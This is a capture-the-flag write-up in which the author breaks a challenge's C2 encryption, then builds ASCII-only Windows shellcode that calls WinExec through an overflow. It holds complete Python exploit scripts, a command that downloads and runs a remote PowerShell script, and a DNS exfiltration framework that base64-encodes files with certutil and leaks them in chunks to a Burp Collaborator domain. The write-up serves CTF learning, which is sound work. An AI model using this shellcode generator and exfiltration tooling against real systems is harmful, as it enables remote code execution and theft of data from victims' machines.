I tried this out by registering twice with the same parameters to get two different ciphertexts. For example, with a=roVwGx&b=gD4ZuM&c=pFvulv&d=XH2CPq&e=I3Yonk
, I got oVSFHfzJoQSfTP3PphqGSf7Lug+HTfrSrwHXRv2c9ATWGfma
and iVrBK8DOiQrbesHIjhTCf8LMkgHDe8bVhw+TcMGb3AqSL8Wd
. Next, I base64-decoded them and XORed them together. This returned the plaintext (.D6<.(.D6<.(.D6<.(.D6<.(.D6<.(.D6<.
which was a repeating series of 6 bytes:
28 0e 44 36 3c 07
28 0e 44 36 3c 07
28 0e 44 36 3c 07
28 0e 44 36 3c 07
28 0e 44 36 3c 07
28 0e 44 36 3c 07
What did this mean? Since the randomly-generated parameters made up 6 bytes each, I decided to try XORing this output again with each of the parameters. Voila: the mysterious 6 bytes were simply pFvulv
(parameter c
) XORed with XH2CPq
(parameter e
). This meant that the C2 cipher randomly selected one of the parameters at registration and repeated it 6 times to create the plaintext.
However, while this explained why the encrypted UwUIDs repeated over time, this looked nothing like a plaintext UwUID. I also retrieved the keystream by XORing the plaintexts with their respective ciphertexts but did not get anything interesting.
Thinking further, I recalled an interesting observation from when I crashed the C2 encrypting function. While I was waiting for the organisers to fix the problem, I tried registering from a remote DigitalOcean Droplet instance and successfully retrieved valid encrypted UwUIDs even though I was unable to do so from my home network. This suggested that the encryption relied on the IP address. I logged into the remote instance and tried generating encrypted UwUIDs with the exact same parameters I had been using. It returned encrypted UwUIDs that were completely different from the ones I had generated from my home network, confirming the IP address hunch. I repeated the same process to retrieve the keystream and compared it to the keystream for my home network.
Keystream 1: d5 10 a7 32 c3 bd d1 46 e9 68 96 bc d0 5c f0 69 93 b9 ca 48 f6 6e 96 a4 84 43 f2 3f 9d e8 d7 12 a6 6e 95 e8
Keystream 2: d1 12 f3 68 90 bf d1 42 e9 39 91 b9 d6 5c f0 3c 92 bd ca 49 f1 38 96 a4 df 47 a1 33 91 ea 84 42 a0 6c 95 ec
I noticed that some bytes matched at the same positions in both keystreams. Most of these were in the same positions as the dash characters in the unencrypted master UwUIDs.
Keystream 1: d5 10 a7 32 c3 bd d1 46 e9 68 96 bc d0 5c f0 69 93 b9 ca 48 f6 6e 96 a4 84 43 f2 3f 9d e8 d7 12 a6 6e 95 e8
Keystream 2: d1 12 f3 68 90 bf d1 42 e9 39 91 b9 d6 5c f0 3c 92 bd ca 49 f1 38 96 a4 df 47 a1 33 91 ea 84 42 a0 6c 95 ec
MasterUwUID: 7 1 5 c f 1 a 6 - 5 1 d e - 4 a 5 5 - b e 1 1 - c 0 f f e e c 0 f f e e
This strongly signalled that a double-layer known-plaintext attack was at work. The keystream specific to each IP address used to encrypt the random 6-character parameter values was itself a ciphertext generated by XORing the plaintext UwUID belonging to the IP address with a master keystream. Since all plaintext UwUIDs had dash characters in the same positions, their IP address-specific keystreams would also have the same XOR result in those positions.
MASTER_KS = RC4(MASTER_K)
KS1 = MASTER_KS XOR UWUID1
KS2 = MASTER_KS XOR UWUID2
C1 = KS1 XOR RANDOMLY_SELECTED_PARAMETER_VALUE1
C2 = KS2 XOR RANDOMLY_SELECTED_PARAMETER_VALUE2
This explained why when I sent the same parameter values from different IP addresses, their encrypted UwUIDs never matched. But how could I retrieve the master keystream? Other than the dashes, I knew that the plaintext UwUIDs were hexadecimal number characters, i.e. 0-9a-f
. With enough individual keystream samples, I could brute force all possible master keystream bytes and select the right one based on whether the candidate byte at position x XORed with all of the keystreams' bytes at position x always returned a byte in the range ASCII 0-9a-f
.
Using my favourite VPN ExpressVPNNordVPN, I set to work. I generated and retrieved 13 different keystreams from 13 different IP addresses, then used the CyberChef XOR brute force filter to manually check which byte matched. Byte by byte, the keystream emerged. Fortunately, I realised that the master keystream was actually a series of 6 repeating bytes, e7 71 c4 0a a5 89
. Next, I XORed the individual keystreams against the master keystream. To my delight, this resulted in legitimate plaintext UwUIds.
With the plaintext UwUID for my IP address, I sent a message using the POST /send.php
endpoint, then checked the POST /receive.php
endpoint with the encrypted UwUID. The message came through! Now, I could finally figure out why my payloads weren't working. Immediately, I realised that any payload above a certain length resulted in an empty message. I gradually narrowed down the maximum length to 328. Additionally, the first 32 bytes were rewritten to UwUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU
. Finally, there were a few bad characters like \x25\x26\x2b
. Fortunately, this seemed pretty manageable.
Or so I thought. Not long after, I received a notification from the organisers that they had fixed a bug in the servers. When I retried the receive endpoints, I realised that the number of bad bytes had increased enormously – any byte from \x80
onwards was nulled out. In other words, I had to write ASCII-only shellcode.
While I was fairly comfortable with writing Windows shellcode thanks to the Offensive Security Exploit Developer (OSED) course, I had never faced such severe restrictions before. There were a few writeups on ASCII-only Linux shellcode online but I could not find one for Windows that matched my length requirements.
After the initial panic, I settled on my plan of action. First, I noticed that UwU.exe
imported GetProcAddress
and GetModuleHandleW
, so I could dereference those functions from fixed addresses in the Import Address Table of the executable (remember there were no memory protections like ASLR) and use them to retrieve the address of WinExec
from Kernel32
. Afterwards, I could call WinExec
with my desired commands. To build my shellcode, I heavily modified a Windows shellcode generation script I had previously used for OSED. After doing some research, I also found a useful Linux ASCII shellcode writeup that highlighted several useful gadgets:
## h4W1P - push 0x50315734 # + pop eax -> set eax
## 5xxxx - xor eax, xxxx # use xor to generate string
## j1X41 - eax <- 0 # clear eax
## 1B2 - xor DWORD PTR [edx+0x32], eax # assign value to shellcode
## 2J2 - xor cl, BYTE PTR [edx+0x32] # nop
## 41 - xor al, 0x31 # nop
## X - pop eax
## P - push eax
In particular, I could use xor DWORD PTR [edx+0x32], eax
to decode non-ASCII instructions when I could not find a suitable ASCII replacement.
Finally, I found the smallest null-free WinExec shellcode to use as a reference.
With these tools in hand, I began to craft my shellcode. Starting from the top, I replaced my original POP POP RET
pointer 0x55758b55
with 0x55756e78
which pointed to pop ebx ; pop ebp ; retn 0x0004
to meet the ASCII character requirements. I also replaced the non-ASCII JMP 0x8
(eb 06
) with the ASCII-only JNS 0x8
(79 06
). Afterwards, I used the xor DWORD PTR [edx+0x32], eax
decoder gadget for my shellcode. My first draft relied heavily on this gadget and did not replace many non-ASCII instructions. I also originally tried to use GetModuleHandleW
and GetProcAddress
to resolve the address of WinExec
. However, for some reason or another, GetProcAddress
could not work at all even though GetModuleHandleW
worked perfectly. I suspected that this was some strange wide string versus regular string bug but could not fix it even after debugging with GetLastError
. It could also have been due to Import Address Filter protections but I could not confirm if that flag was turned on.
Giving up on GetProcAddress
, I decided to pass the base address of Kernel32
I had retrieved with GetModuleHandleW
to the function search loop used in my reference shellcode. With lots of effort, I eventually got my patchwork payload to work and execute a simple calc
. Next, I modified it to powershell iex $(irm http://<IP ADDRESS>)
to download and execute a remote PowerShell script. Although this worked on my local instances, it failed when I tried it on the master UwUIDs – an incresingly common pattern. As I was working without any visibility of the bot masters, I faced huge difficulties trying to figure out why it was failing. After hours of frustration, I decided to focus on cleaning up my shellcode – perhaps the messy shellcode caused problems.
Firstly, my over-reliance on the decoding gadget created lots of unnecessary instructions, reducing the number of bytes available for my WinExec
command. I bit the bullet and tried to convert some of the encoded bytes to true ASCII shellcode. I discovered a few useful gadgets to replace these instructions with their ASCII equivalents.
Non-ASCII Bytes | Non-ASCII Instructions | ASCII Bytes | ASCII Instructions |
---|---|---|---|
01 fe | add esi,edi; | 57 03 34 24 | push edi; add esi, DWORD PTR [esp]; |
8b 74 1f 1c | mov esi, DWORD PTR [edi+ebx*1+0x1c]; | 5e 33 74 1f 1c | pop esi; xor esi, DWORD PTR [edi+ebx*1+0x1c]; |
31 db | xor ebx, ebx; | 53 33 1c 24 | push ebx; xor ebx, DWORD PTR [esp]; |
The only non-ASCII instructions I could not replace were the CALL
and negative short JMP
instructions, so I continued to rely on the decoder gadget for those. Thanks to these optimisations, I cut down on two-thirds of the decoder gadgets and freed up 40 bytes – a fortune in shellcode. I now had 76 bytes for my command argument. I also patched a bug where Windows 7 needed a valid uCmdShow
argument for WinExec
– Windows 8 and 10 gracefully dealt with any invalid uCmdShow
arguments. My new and improved shellcode worked much more reliably.
##!/usr/bin/python3
import argparse
import keystone as ks
from struct import pack
def to_hex(s):
retval = list()
for char in s:
retval.append(hex(ord(char)).replace("0x", ""))
return "".join(retval)
def push_string(input_string):
rev_hex_payload = str(to_hex(input_string))
rev_hex_payload_len = len(rev_hex_payload)
instructions = []
first_instructions = []
null_terminated = False
for i in range(rev_hex_payload_len, 0, -1):
# add every 4 byte (8 chars) to one push statement
if ((i != 0) and ((i % 8) == 0)):
target_bytes = rev_hex_payload[i-8:i]
instructions.append(f"push dword 0x{target_bytes[6:8] + target_bytes[4:6] + target_bytes[2:4] + target_bytes[0:2]};")
# handle the left ofer instructions
elif ((0 == i-1) and ((i % 8) != 0) and (rev_hex_payload_len % 8) != 0):
if (rev_hex_payload_len % 8 == 2):
first_instructions.append(f"mov al, 0x{rev_hex_payload[(rev_hex_payload_len - (rev_hex_payload_len%8)):]};")
first_instructions.append("push eax;")
elif (rev_hex_payload_len % 8 == 4):
target_bytes = rev_hex_payload[(rev_hex_payload_len - (rev_hex_payload_len%8)):]
first_instructions.append(f"mov ax, 0x{target_bytes[2:4] + target_bytes[0:2]};")
first_instructions.append("push eax;")
else:
target_bytes = rev_hex_payload[(rev_hex_payload_len - (rev_hex_payload_len%8)):]
first_instructions.append(f"mov al, 0x{target_bytes[4:6]};")
first_instructions.append("push eax;")
first_instructions.append(f"mov ax, 0x{target_bytes[2:4] + target_bytes[0:2]};")
first_instructions.append("push ax;")
null_terminated = True
instructions = first_instructions + instructions
asm_instructions = "".join(instructions)
return asm_instructions
def ascii_shellcode(breakpoint=0):
command = "calc"
if len(command) > 76:
exit(1)
command += " " * (76 - len(command)) # amount of padding available
asm = [
# at start, eax, esi, edi are nulled
" start: ",
f"{['', 'int3;'][breakpoint]} ",
" pop edx ;",
" pop edx ;", # Pointer to shellcode in edx
" xor al, 0x7f;", # inc eax to 0x80 which xors out the ones that are out of reach
" inc eax;",
" xor dword ptr [edx+0x6e], eax;", # correct ff d7 call edi
" xor dword ptr [edx+0x6f], eax;", # correct ff d7 call edi
" push 0x7f;", # dont need ebx, use eax
" pop ebx;",
" xor dword ptr [edx+ebx+0x24], eax;", # correct ad lods eax,dword ptr ds:[esi]
" xor dword ptr [edx+ebx+0x29], eax;", # correct 75 ed jne 0x68
" push 0x7f;",
" add ebx, dword ptr [esp];",
" xor dword ptr [edx+ebx+0x27], eax;", # correct ff d7 call edi msiexec
" xor dword ptr [edx+ebx+0x28], eax;", # correct ff d7 call edi
" xor dword ptr [edx+ebx+0x7f], eax;", # correct ff d7 call edi
" xor dword ptr [edx+ebx+0x7f], eax;", # correct ff d7 call edi
" push 0x53736046;", # 60 should xor with 80 to get e0
" pop ebx;", # IAT address pointer to GetModuleHandle in ebx
" push 0x01014001;",
" add ebx, dword ptr [esp];",
" add ebx, dword ptr [esp];",
" push 0x01010101;", # use eax to xor for null bytes in wide string and invalid chars in GetModuleHandle address pointer
" pop eax;", # use eax to xor for null bytes in wide string
" xor edi, dword ptr [ebx];", # dereference IAT, get GetModuleHandle in edi
" push esi;", # nulls for end of wide string
" push 0x01330132;", # push widestring "kernel32" onto stack
" xor dword ptr [esp], eax;",
" push 0x016d0164;",
" xor dword ptr [esp], eax;",
" push 0x016f0173;",
" xor dword ptr [esp], eax;",
" push 0x0164016a;",
" xor dword ptr [esp], eax;",
" push esp;",
" call edi;", # call GetModuleHandle(&"kernel32")
" push eax;", # Kernel32 base address in eax
" pop edi;",
" push esi;", # null bytes
" pop ebx;",
" xor ebx, dword ptr [edi + 0x3C];", # ebx = [kernel32 + 0x3C] = offset(PE header)
" push ebx;", # null out bytes on top of stack
" xor ebx, dword ptr [esp];",
" pop eax;",
" xor ebx, dword ptr [edi + eax + 0x78];", # ebx = [PE32 optional header + offset(PE32 export table offset)] = offset(export table)
" xor esi, dword ptr [edi + ebx + 0x20];", # esi = [kernel32 + offset(export table) + 0x20] = offset(names table)
" push edi;",
" add esi, dword ptr [esp];", # esi = kernel32 + offset(names table) = &(names table)
" xor dword ptr [esp], edi;", # null out bytes on top of stack
" pop edx;",
" xor edx, [edi + ebx + 0x24];", # edx = [kernel32 + offset(export table) + 0x24] = offset(ordinals table)
push_string("WinE"),
" pop ecx;", # ecx = 'WinE'
" find_winexec_x86:"
" push ebp;",
" xor dword ptr [esp], ebp;", # null out bytes on top of stack
" AND ebp, dword ptr [esp];", # nulls out ebp for xor operation
" xor BP, WORD ptr [edi + edx];", # ebp = [kernel32 + offset(ordinals table) + offset] = function ordinal
" INC edx;",
" INC edx;", # edx = offset += 2
" lodsd;", # eax = &(names table[function number]) = offset(function name)
" CMP [edi + eax], ecx; " # *(DWORD*)(function name) == "WinE" ?
" JNE find_winexec_x86;",
" pop esi;",
" xor esi, dword ptr [edi + ebx + 0x1C];", # esi = [kernel32 + offset(export table) + 0x1C] = offset(address table)] = offset(address table)
" push edi;",
" add esi, dword ptr [esp];", # esi = kernel32 + offset(address table) = &(address table)
" push ebp;",
" add ebp, dword ptr [esp];",
" add edi, [esi + ebp * 2];", # edi = kernel32 + [&(address table)[WinExec ordinal]] = offset(WinExec) = &(WinExec)
" push 0x31;", # null out eax
" pop eax;",
" xor al, 0x31;",
" push eax;",
push_string(command), # set up args for WinExec
" push esp;",
" pop ebx;",
" inc eax;",
" push eax;",
" push ebx;",
" inc ecx;", # NOP
" inc ecx;", # NOP
" CALL edi;", # WinExec(&("calc"), 1);
# If you like graceful exits
# " push 0x53736016;",
# " pop ebx;",
# " push 0x01014001;",
# " add ebx, dword ptr [esp];",
# " add ebx, dword ptr [esp];", # ebx = IAT address pointer to TerminateProcess
# " push eax;",
# " xor eax, dword ptr [esp];", # uExitCode = 0
# " push eax;",
# " and edi, dword ptr [esp];", # null out edi
# " xor edi, dword ptr [ebx];", # edi = *TerminateProcess
# " dec eax;", # hProcess = 0xFFFFFFFF
# " push eax;",
# " inc ecx;", # NOP
# " call edi;", # TerminateProcess(0xFFFFFFFF, 0)
]
return "\n".join(asm)
def main(args):
shellcode = ascii_shellcode( args.debug_break)
eng = ks.Ks(ks.KS_ARCH_X86, ks.KS_MODE_32)
encoding, _ = eng.asm(shellcode)
url_encoded_payload = ""
payload = b'UwU' # magic bytes
payload += b'A' * 29 # offset
payload += pack("<L", (0x41410679)) # jns 0x8
payload += pack("<L", (0x55756e78)) # pop ebx ; pop ebp ; retn 0x0004
payload += bytes(encoding) # shellcode
payload += b"A" * (328 - len(payload)) # filler
for enc in payload:
url_encoded_payload += "%{0:02x}".format(enc)
print("url_encoded_payload = " + url_encoded_payload
.replace("%ff%d7", "%7f%57")
.replace("%8b","%0b")
.replace("%fe","%7e")
.replace("%b7","%37")
.replace("%ad","%2d")
.replace("%ee","%6e")
.replace("%ae","%2e")
.replace("%ed", "%6d"))
if __name__ == "__main__":
parser = argparse.ArgumentParser(
description="Creates shellcodes compatible with the OSED lab VM"
)
parser.add_argument(
"-d",
"--debug-break",
help="add a software breakpoint as the first shellcode instruction",
action="store_true",
)
args = parser.parse_args()
main(args)
This time, I had enough bytes to run a ping <BURP COLLABORATOR DOMAIN>
command on the bot masters. Thankfully, I got a pingback!
I excitedly began trying other payloads like the remote PowerShell script execution, msiexec
, and more. However, despite my many attempts, none of these reached my server other than the DNS requests. With a growing sense of dread, I came to terms with what this meant: the challenge expected me to use DNS exfiltration. I confirmed this by sending a series of commands like powershell Add-Content test spaceraccoon
, powershell Add-Content test .<BUR PCOLLABORATOR URL>
, and powershell "ping $(type test)"
, which resulted in a DNS pingback at spaceraccoon.<BURP COLLABORATOR DOMAIN>
.
While there was good news – I could write to arbitrary files – this further confirmed that DNS exfiltration was the way to go. I began writing a script to automate this exfiltration. To retrieve the outputs of commands, I wrote the output of the command to a working file, then appended my burpcollaborator domain. Next, I replaced any non-DNS-compatible characters using PowerShell. Finally, I pinged the concatenated domain in the file and hopefully retrieved the output.
For example, to retrieve the current working directory, I ran:
def exfil_working_file():
send_command("powershell Add-Content {} .{}. -NoNewLine".format(WORKING_FILE, COLLABORATOR_INSTANCE))
send_command("powershell Add-Content {} burpcollaborator.net -NoNewLine".format(WORKING_FILE))
send_command("powershell ping $(type {})".format(WORKING_FILE))
delete_file(WORKING_FILE)
def get_pwd():
send_command("cmd /c \"cd > {}\"".format(WORKING_FILE))
send_command("powershell \"(Get-Content {}).replace(':', '-') | Set-Content {} -NoNewLine\"".format(WORKING_FILE, WORKING_FILE))
send_command("powershell \"(Get-Content {}).replace('\\', '-') | Set-Content {} -NoNewLine\"".format(WORKING_FILE, WORKING_FILE))
send_command("powershell \"(Get-Content {}).replace(' ', '.') | Set-Content {} -NoNewLine\"".format(WORKING_FILE, WORKING_FILE))
exfil_working_file()
I got a pingback at C--Users-Administrator-AppData-LocalLow.<BURP COLLABORATOR DOMAIN>
, which I converted back to C:\Users\Administrator\AppData\LocalLow
.
Since the master bots included the special UwU.exe
instances with the flag, I aimed to locate and exfiltrate it. I began enumerating the files in the current working directory with:
def get_file_name(index):
send_command("powershell \"Add-Content {} $(ls)[{}].Name -NoNewLine\"".format(WORKING_FILE, index))
send_command("powershell \"(Get-Content {}).replace('_', '-') | Set-Content {} -NoNewLine\"".format(WORKING_FILE, WORKING_FILE))
exfil_working_file()
This leaked the file names Microsoft
, Temp
, and 1_run_uwu1.bat
. This seemed interesting. To exfiltrate files, I first converted them to base64 using certutil
and a special undocumented option. I then replaced the incompatible base64 characters like +
and /
with -
and .
respectively. Unfortunately, I could not use +
directly since \x26
was a bad character, so I replaced it with the functionally-equivalent [char]43
. I also removed any trailing =
characters. Next, I exfiltrated the file in blocks of 50 base64 characters at a time. To ensure that I got the blocks in the correct order, I added the block number before and after the base64 characters as a primitive checksum.
def delete_file(filename):
send_command('powershell del {}'.format(filename))
def get_file_length(filename):
send_command("powershell \"Add-Content {} $(Get-Content {}).length -NoNewLine\"".format(WORKING_FILE, filename))
exfil_working_file()
def exfil_file(filename):
base64_file = "e"
block_size = 50
# delete base64 file
delete_file(base64_file)
# create base64 file
send_command("certutil -encodehex -f {} {} 0x40000001".format(filename, base64_file))
# get base64 file length
get_file_length(base64_file)
file_length = int(input("[*] Enter received base64 file length: "))
# replace non-DNS compliant chars
send_command("powershell \"(Get-Content {}).replace([char]43, '-') | Set-Content {}\"".format(base64_file, base64_file))
send_command("powershell \"(Get-Content {}).replace('/', '.') | Set-Content {}\"".format(base64_file, base64_file))
send_command("powershell \"(Get-Content {}).replace('=', '') | Set-Content {}\"".format(base64_file, base64_file))
offset = 0
while offset < file_length:
print("[+] Exfiltrating offset {} in file {}".format(offset, filename))
# Add offset at front and back to prevent .. error and also to ensure that all blocks are received
send_command("powershell \"Add-Content {} {} -NoNewLine\"".format(WORKING_FILE, offset))
if (offset + block_size) > file_length:
send_command("powershell \"Add-Content {} $(Get-Content {}).substring({},{}) -NoNewLine\"".format(WORKING_FILE, base64_file, offset, file_length - offset - 1))
else:
send_command("powershell \"Add-Content {} $(Get-Content {}).substring({},{}) -NoNewLine\"".format(WORKING_FILE, base64_file, offset, block_size))
send_command("powershell \"Add-Content {} {} -NoNewLine\"".format(WORKING_FILE, offset))
offset += block_size
exfil_working_file()
After a long wait, I got the contents of 1_run_uwu1.bat
.
@echo off
echo ^1>uwu_cmds.txt
echo %c2ip%>>uwu_cmds.txt
echo %c2port%>>uwu_cmds.txt
echo ^3>>uwu_cmds.txt
:loop
type uwu_cmds.txt | C:\Users\Administrator\AppData\LocalLow\cmd.exe /c final_uwu_with_flag.exe
taskkill /im werfault.exe /f
goto loop
Great! I could try exfiltrating final_uwu_with_flag.exe
, but my get_file_length
function told me that the base64 encoding of final_uwu_with_flag.exe
was 989868 bytes long, which would have taken days to exfiltrate. Instead, the contents of 1_run_uwu1.bat
gave me an idea – why not pipe inputs to final_uwu_with_flag.exe
to execute the “Display Killswitch” option, write the output to a file, then exfiltrate that instead? I could save even more bytes by grepping the output for the TISC{
flag marker.
def exfil_final_uwu():
delete_file("c")
delete_file("x")
delete_file("y")
send_command("cmd /c \"echo ^4 > c\"")
send_command("cmd /c \"echo ^5 >> c\"")
send_command("cmd /c \"type c | cmd /c final_uwu_with_flag.exe > x\"")
sleep(3) # more time to play UwU sound
send_command("powershell \"Select-String -Path x -Encoding ascii -Pattern TISC|Out-File y\"") # save more time
exfil_file("y")
Without further ado, I started the exfiltration. As each minute ticked by, the base64 strings slowly emerged.
Halfway through, I placed the half-finished base64 string into a decoder, and there it was. I had finally reached the end of this insane odyssey. Thankfully, there was no bonus level, so I submitted my flag and got some sleep.
##!/usr/bin/python3
import requests
import keystone as ks
from struct import pack
from time import sleep
## import uuid
def to_hex(s):
retval = list()
for char in s:
retval.append(hex(ord(char)).replace("0x", ""))
return "".join(retval)
def push_string(input_string):
rev_hex_payload = str(to_hex(input_string))
rev_hex_payload_len = len(rev_hex_payload)
instructions = []
first_instructions = []
null_terminated = False
for i in range(rev_hex_payload_len, 0, -1):
# add every 4 byte (8 chars) to one push statement
if ((i != 0) and ((i % 8) == 0)):
target_bytes = rev_hex_payload[i-8:i]
instructions.append(f"push dword 0x{target_bytes[6:8] + target_bytes[4:6] + target_bytes[2:4] + target_bytes[0:2]};")
# handle the left ofer instructions
elif ((0 == i-1) and ((i % 8) != 0) and (rev_hex_payload_len % 8) != 0):
if (rev_hex_payload_len % 8 == 2):
first_instructions.append(f"mov al, 0x{rev_hex_payload[(rev_hex_payload_len - (rev_hex_payload_len%8)):]};")
first_instructions.append("push eax;")
elif (rev_hex_payload_len % 8 == 4):
target_bytes = rev_hex_payload[(rev_hex_payload_len - (rev_hex_payload_len%8)):]
first_instructions.append(f"mov ax, 0x{target_bytes[2:4] + target_bytes[0:2]};")
first_instructions.append("push eax;")
else:
target_bytes = rev_hex_payload[(rev_hex_payload_len - (rev_hex_payload_len%8)):]
first_instructions.append(f"mov al, 0x{target_bytes[4:6]};")
first_instructions.append("push eax;")
first_instructions.append(f"mov ax, 0x{target_bytes[2:4] + target_bytes[0:2]};")
first_instructions.append("push ax;")
null_terminated = True
instructions = first_instructions + instructions
asm_instructions = "".join(instructions)
return asm_instructions
def ascii_shellcode(command):
if len(command) > 76:
print("[-] Command is too long!")
exit(1)
padded_command = command + " " * (76 - len(command)) # amount of padding available
asm = [
# at start, eax, esi, edi are nulled
" start:",
" pop edx;",
" pop edx;", # Pointer to shellcode in edx
" xor al, 0x7f;", # inc eax to 0x80 which xors out the ones that are out of reach
" inc eax;",
" xor dword ptr [edx+0x6e], eax;", # correct ff d7 call edi
" xor dword ptr [edx+0x6f], eax;", # correct ff d7 call edi
" push 0x7f;", # dont need ebx, use eax
" pop ebx;",
" xor dword ptr [edx+ebx+0x24], eax;", # correct ad lods eax,dword ptr ds:[esi]
" xor dword ptr [edx+ebx+0x29], eax;", # correct 75 ed jne 0x68
" push 0x7f;",
" add ebx, dword ptr [esp];",
" xor dword ptr [edx+ebx+0x27], eax;", # correct ff d7 call edi
" xor dword ptr [edx+ebx+0x28], eax;", # correct ff d7 call edi
" xor dword ptr [edx+ebx+0x7f], eax;", # correct ff d7 call edi
" xor dword ptr [edx+ebx+0x7f], eax;", # correct ff d7 call edi
" push 0x53736046;", # 60 should xor with 80 to get e0
" pop ebx;", # IAT address pointer to GetModuleHandle in ebx
" push 0x01014001;",
" add ebx, dword ptr [esp];",
" add ebx, dword ptr [esp];",
" push 0x01010101;", # use eax to xor for null bytes in wide string and invalid chars in GetModuleHandle address pointer
" pop eax;", # use eax to xor for null bytes in wide string
" xor edi, dword ptr [ebx];", # dereference IAT, get GetModuleHandle in edi
" push esi;", # nulls for end of wide string
" push 0x01330132;", # push widestring "kernel32"
" xor dword ptr [esp], eax;",
" push 0x016d0164;",
" xor dword ptr [esp], eax;",
" push 0x016f0173;",
" xor dword ptr [esp], eax;",
" push 0x0164016a;",
" xor dword ptr [esp], eax;",
" push esp;",
" call edi;", # call GetModuleHandleW(&"kernel32")
" push eax;", # Kernel32 base address in eax
" pop edi;",
" push esi;", # null bytes
" pop ebx;",
" xor ebx, dword ptr [edi + 0x3C];", # ebx = [kernel32 + 0x3C] = offset(PE header)
" push ebx;", # null out bytes on top of stack
" xor ebx, dword ptr [esp];",
" pop eax;",
" xor ebx, dword ptr [edi + eax + 0x78];", # ebx = [PE32 optional header + offset(PE32 export table offset)] = offset(export table)
" xor esi, dword ptr [edi + ebx + 0x20];", # esi = [kernel32 + offset(export table) + 0x20] = offset(names table)
" push edi;",
" add esi, dword ptr [esp];", # esi = kernel32 + offset(names table) = &(names table)
" xor dword ptr [esp], edi;", # null out value on stack
" pop edx ;",
" xor edx, [edi + ebx + 0x24];", # edx = [kernel32 + offset(export table) + 0x24] = offset(ordinals table)
push_string("WinE"),
" pop ecx;", # ecx = 'WinE'
" find_winexec_x86:"
" push ebp;",
" xor dword ptr [esp], ebp;", # null out bytes on top of stack
" and ebp, dword ptr [esp];", # nulls out ebp for xor operation
" xor BP, WORD ptr [edi + edx];", # ebp = [kernel32 + offset(ordinals table) + offset] = function ordinal
" inc edx;",
" inc edx;", # edx = offset += 2
" lodsd;", # eax = &(names table[function number]) = offset(function name)
" cmp [edi + eax], ecx;" # *(dword*)(function name) == "WinE" ?
" jne find_winexec_x86;",
" pop esi;",
" xor esi, dword ptr [edi + ebx + 0x1C];" # esi = [kernel32 + offset(export table) + 0x1C] = offset(address table)] = offset(address table)
" push edi;",
" add esi, dword ptr [esp];", # esi = kernel32 + offset(address table) = &(address table)
" push ebp;",
" add ebp, dword ptr [esp];",
" add edi, [esi + ebp * 2];", # edi = kernel32 + [&(address table)[WinExec ordinal]] = offset(WinExec) = &(WinExec)
" push 0x31;", # null out eax
" pop eax;",
" xor al, 0x31;",
" push eax;", # nulls
push_string(padded_command), # set up args for WinExec
" push esp;",
" pop ebx;",
" inc eax;",
" push eax;",
" push ebx;",
" inc ecx;", # NOP
" inc ecx;", # NOP
" call edi;", # WinExec(&("calc"), 1);
]
return "\n".join(asm)
## o2r7vffpq263v6rrjsyxq4xp7gd61v.burpcollaborator.net
COLLABORATOR_INSTANCE = "o2r7vffpq263v6rrjsyxq4xp7gd61v"
FILE_NAME = "1_run_uwu1.bat"
BANNED_CHARS = ['%', '&', '+']
C2_URL = 'http://<IP ADDRESS>:18080/send.php'
TARGET_UWUID = '715cf1a6-51de-4a55-be11-c0ffeec0ffee'
WORKING_FILE = 'l'
def send_command(command):
for banned_char in BANNED_CHARS:
if banned_char in command:
print("Banned chars detected in command!")
exit(1)
print("[+] Sending command: {}".format(command))
shellcode = ascii_shellcode(command)
eng = ks.Ks(ks.KS_ARCH_X86, ks.KS_MODE_32)
encoding, _ = eng.asm(shellcode)
payload_string = ""
payload = b'UwU'
payload += b'A' * 29
payload += pack("<L", (0x41410679)) + pack("<L", (0x55756e78))
payload += bytes(encoding)
payload += b"A" * (328 - len(payload))
payload = payload.replace(b'\xff\xd7', b'\x7f\x57').replace(b'\x8b', b'\x0b').replace(b'\xfe', b'\x7e').replace(b'\xb7', b'\x37').replace(b'\xad', b'\x2d').replace(b'\xee', b'\x6e').replace(b'\xae', b'\x2e').replace(b'\xed', b'\x6d')
for enc in payload:
payload_string += "%{0:02x}".format(enc)
payload_string = payload_string.replace("%ff%d7", "%7f%57").replace("%8b","%0b").replace("%fe","%7e").replace("%b7","%37").replace("%ad","%2d").replace("%ee","%6e").replace("%ae","%2e").replace("%ed", "%6d")
headers = {
'User-Agent': 'UwUserAgent/1.0'
}
requests.post(C2_URL, headers=headers, data={'action': 'send', 'a': '715cf1a6-51de-4a55-be11-c0ffeec0ffee', 'b': payload})
sleep(5)
def exfil_working_file():
send_command("powershell Add-Content {} .{}. -NoNewLine".format(WORKING_FILE, COLLABORATOR_INSTANCE))
send_command("powershell Add-Content {} burpcollaborator.net -NoNewLine".format(WORKING_FILE))
send_command("powershell ping $(type {})".format(WORKING_FILE))
delete_file(WORKING_FILE)
def delete_file(filename):
send_command('powershell del {}'.format(filename))
def get_file_length(filename):
send_command("powershell \"Add-Content {} $(Get-Content {}).length -NoNewLine\"".format(WORKING_FILE, filename))
exfil_working_file()
def exfil_file(filename):
base64_file = "e"
block_size = 50
# delete base64 file
delete_file(base64_file)
# create base64 file
send_command("certutil -encodehex -f {} {} 0x40000001".format(filename, base64_file))
# get base64 file length
get_file_length(base64_file)
file_length = int(input("[*] Enter received base64 file length: "))
# replace non-DNS compliant chars
send_command("powershell \"(Get-Content {}).replace([char]43, '-') | Set-Content {}\"".format(base64_file, base64_file))
send_command("powershell \"(Get-Content {}).replace('/', '.') | Set-Content {}\"".format(base64_file, base64_file))
send_command("powershell \"(Get-Content {}).replace('=', '') | Set-Content {}\"".format(base64_file, base64_file))
offset = 0
while offset < file_length:
print("[+] Exfiltrating offset {} in file {}".format(offset, filename))
# Add offset at front and back to prevent .. error and also to ensure that all blocks are received
send_command("powershell \"Add-Content {} {} -NoNewLine\"".format(WORKING_FILE, offset))
if (offset + block_size) > file_length:
send_command("powershell \"Add-Content {} $(Get-Content {}).substring({},{}) -NoNewLine\"".format(WORKING_FILE, base64_file, offset, file_length - offset - 1))
else:
send_command("powershell \"Add-Content {} $(Get-Content {}).substring({},{}) -NoNewLine\"".format(WORKING_FILE, base64_file, offset, block_size))
send_command("powershell \"Add-Content {} {} -NoNewLine\"".format(WORKING_FILE, offset))
offset += block_size
exfil_working_file()
## if any blocks were dropped previously
def exfil_lost_block(filename, offset, length):
print("[+] Exfiltrating offset {} in file {}".format(offset, filename))
send_command("powershell \"Add-Content {} {} -NoNewLine\"".format(WORKING_FILE, offset))
send_command("powershell \"Add-Content {} $(Get-Content {}).substring({},{}) -NoNewLine\"".format(WORKING_FILE, filename, offset, length))
send_command("powershell \"Add-Content {} {} -NoNewLine\"".format(WORKING_FILE, offset))
